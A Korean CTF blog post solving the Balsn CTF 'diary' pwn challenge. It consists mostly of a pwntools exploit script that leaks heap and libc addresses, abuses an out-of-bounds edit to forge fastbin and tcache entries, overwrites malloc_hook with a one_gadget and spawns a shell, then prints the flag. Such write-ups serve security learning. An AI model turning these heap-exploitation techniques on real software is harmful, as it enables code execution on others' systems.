<문제>
Diaries -- fun to read, painful to keep
nc diary.balsnctf.com 10101
Source Code
<문제 풀이에 사용된 코드>
아직 정확히는 이해를 못해서 더 heap에 대해 알아봐야할 것 같다.
#!/usr/bin/env python3
from pwn import *
context.arch = 'amd64'
#r = process('./diary', env={'LD_PRELOAD':'./libc-2.29.so'})
r = remote('diary.balsnctf.com', 10101)
def cmd(x):
r.recvuntil('choice : ')
r.send(str(x))
def ss():
cmd(1)
def ww(l, s):
cmd(2)
r.recvuntil('Length : ')
r.send(str(int(l)))
r.recvuntil('Content : ')
r.send(s)
def rr(p):
cmd(3)
r.recvuntil('Page : ')
r.send(str(int(p)))
def ee(p, s):
cmd(4)
r.recvuntil('Page : ')
r.send(str(int(p)))
r.recvuntil('Content : ')
r.send(s)
def tt(p):
cmd(5)
r.recvuntil('Page : ')
r.send(str(int(p)))
'''
1. Use "show name" to leak heap address
2. "Edit" has OOB vuln, use this vuln can overwirte IO_stdin and main_arena
So we can create fake fastbin list and create a fake chunk at front address of malloc_hook
3. Then let fake fastbin list to fill up tcache
4. finally we can use fake fastbin to create a chunk at fake chunk that we made in step2,
then control malloc_hook!
'''
r.recvuntil('name : ')
r.send('a'*32)
ww(0x80, 'a') # 0
ss() # show name can leak heap_address
r.recvuntil('a'*32)
leak_heap = u64(r.recv(6).ljust(8, b'\x00'))
print(hex(leak_heap))
payload = p32(0) + p64(0x31)
payload+= p64(0) + p64(0x31)
#payload+= p64(leak_heap + 0xb0) + p64(0x31)
payload+= p64(leak_heap + 0xb0) + p64(0x31)
payload+= p64(leak_heap + 0xc0) + p64(0x31)
payload+= p64(leak_heap + 0xd0) + p64(0x31)
payload+= p64(leak_heap + 0xe0) + p64(0x31)
payload+= p64(leak_heap + 0x120) + p64(0x31)
payload+= p32(0)
ww(0x80, payload) #1
payload2 = p32(0) + p64(31)
payload2+= p64(leak_heap + 0x130) + p64(0x31)
payload2+= p64(leak_heap + 0x140) + p64(0x31)
payload2+= p64(leak_heap + 0x1f0) + p64(0x31)
payload2+= p64(leak_heap + 0x1f0) + p64(0x31)
ww(0x80, payload2) # 2
ww(0x80, p32(0) + p64(0)*5 + p64(0x71)) # 3
ww(0x80, 'a') # 4
ww(0x80, 'a') # 5
ww(0x80, 'a') # 6
ww(0x80, p32(0) + p64(0)*5 + p64(0x71)) # 7
tt(7)
tt(6)
tt(5)
tt(4)
tt(3)
tt(2)
tt(1)
tt(0)
payload3 = p32(0) + b'\x00'*0x210 + p64(0x31) + p64(0)*5
payload3+= p64(0)
payload3+= p64(leak_heap + 0xb0) # 0x20
#payload3+= p64(leak_heap + 0xb0) # 0x30
payload3+= p64(leak_heap + 0x20) # 0x30
payload3+= p64(leak_heap) # 0x40
payload3+= p64(leak_heap) # 0x50
payload3+= p64(leak_heap + 0x20) # 0x60
payload3+= p64(leak_heap + 0x200 - 0x28) # 0x70
payload3+= p64(leak_heap + 0x200) # 0x80
payload3+= p64(0)
payload3+= p64(leak_heap+0x200) + p64(leak_heap+0x200)*7
ww(0x44, b'\x00'*4 + p64(0x51) + p64(0)*3 + p64(0x31) + p64(leak_heap + 0xb0)) # 8
ee('-6', payload3) # edit can overwrite main_arena
ww(0x24,'a'*0x24) # 9
rr(9)
r.recvuntil('a'*0x24)
leak_heap = u64(r.recv(6).ljust(8, b'\x00'))
print(hex(leak_heap))
ww(0x60, p32(0) + p64(0) + p64(0x31) + p64(leak_heap - 0x90)) #10
libc_base = leak_heap - 0x1e4ca0
print(hex(libc_base))
one_off = 0x106ef8
one_gadget = libc_base + one_off
ww(30, 'a') # 11
ww(30, b'a'*4 + b'a'*8 + p64(one_gadget)) # 12
# BALSN{wh3n_wri73_1s_re4d_4nd_pu7_is_g3t}
r.interactive()
'CTF > Pwn' 카테고리의 다른 글
[hackCTF] Basic_BOF (0) | 2021.02.07 |
---|---|
[hackCTF] Basic_BOF #2 (0) | 2021.02.01 |